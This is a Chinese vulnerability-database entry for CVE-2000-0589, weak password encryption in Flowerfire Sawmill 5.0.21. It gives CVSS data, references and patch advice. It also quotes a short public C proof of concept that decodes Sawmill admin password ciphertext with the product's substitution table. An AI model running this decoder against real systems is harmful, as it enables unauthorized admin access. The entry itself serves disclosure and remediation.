CVE-2000-0589
CVSS7.5
发布时间 :2000-06-26 00:00:00
修订时间 :2013-07-30 00:00:00
NMCOES    

[原文]SawMill 5.0.21 uses weak encryption to store passwords, which allows attackers to easily decrypt the password and modify the SawMill configuration.


[CNNVD]Flowerfire Sawmill弱密码加密漏洞(CNNVD-200006-104)

        SawMill 5.0.21版本使用弱加密存储密码。攻击者可以轻松破解密码并修改SawMill配置。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-310 [密码学安全问题]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0589
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0589
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-104
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-06/0271.html
(VENDOR_ADVISORY)  BUGTRAQ  20000626 sawmill5.0.21 old path bug & weak hash algorithm
http://www.securityfocus.com/bid/1403
(UNKNOWN)  BID  1403
http://archives.neohapsis.com/archives/bugtraq/2000-07/0080.html
(UNKNOWN)  BUGTRAQ  20000706 Patch for Flowerfire Sawmill Vulnerabilities Available

- 漏洞信息

Flowerfire Sawmill弱密码加密漏洞
高危 设计错误
2000-06-26 00:00:00 2005-10-20 00:00:00
远程※本地  
        SawMill 5.0.21版本使用弱加密存储密码。攻击者可以轻松破解密码并修改SawMill配置。

- 公告与补丁

        Flowerfire has upgraded their product free of charge to address this problem.
        Flowerfire Sawmill 5.0.21
        

- 漏洞信息 (20042)

Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability (EDBID:20042)
unix local
2000-06-26 Verified
0 Larry W. Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/1403/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities. 

/*Decrypt password for Sawmill admin account.

Larry W. Cashdollar
lwc@vapid.betteros.org
http://vapid.betteros.org
usage ./decrypt cyphertext

*/

#include <stdio.h>



char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{

  int x, y;
  char cypher[128];

  strncpy (cypher, argv[1], 128);

  for (x = 0; x < strlen (cypher); x++)
    {

      for (y = 0; y < strlen (encode); y++)
        if (cypher[x] == encode[y])
          printf ("%c", alpha[y]);

    }

printf("\n\"+\" could also be a space [ ]\n");

}


		

- 漏洞信息

353
Sawmill Weak Password Encryption Scheme
Remote / Network Access Cryptographic
Loss of Confidentiality Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-06-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 6.0b10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Flowerfire Sawmill Weak Password Encryption Vulnerability
Design Error 1403
Yes Yes
2000-06-26 12:00:00 2009-07-11 02:56:00
Posted to Bugtraq June 26th, 2000 by Larry Cashdollar <lwc@vapid.dhs.org>

- 受影响的程序版本

Flowerfire Sawmill 5.0.21

- 漏洞讨论

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities.

- 漏洞利用

This code decrypts sawmill passwords. Posted to bugtraq by Larry Cashdollar &lt;lwc@vapid.dhs.org&gt; on June 26th, 2000.

- 解决方案

Flowerfire has upgraded their product free of charge to address this problem.


Flowerfire Sawmill 5.0.21

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站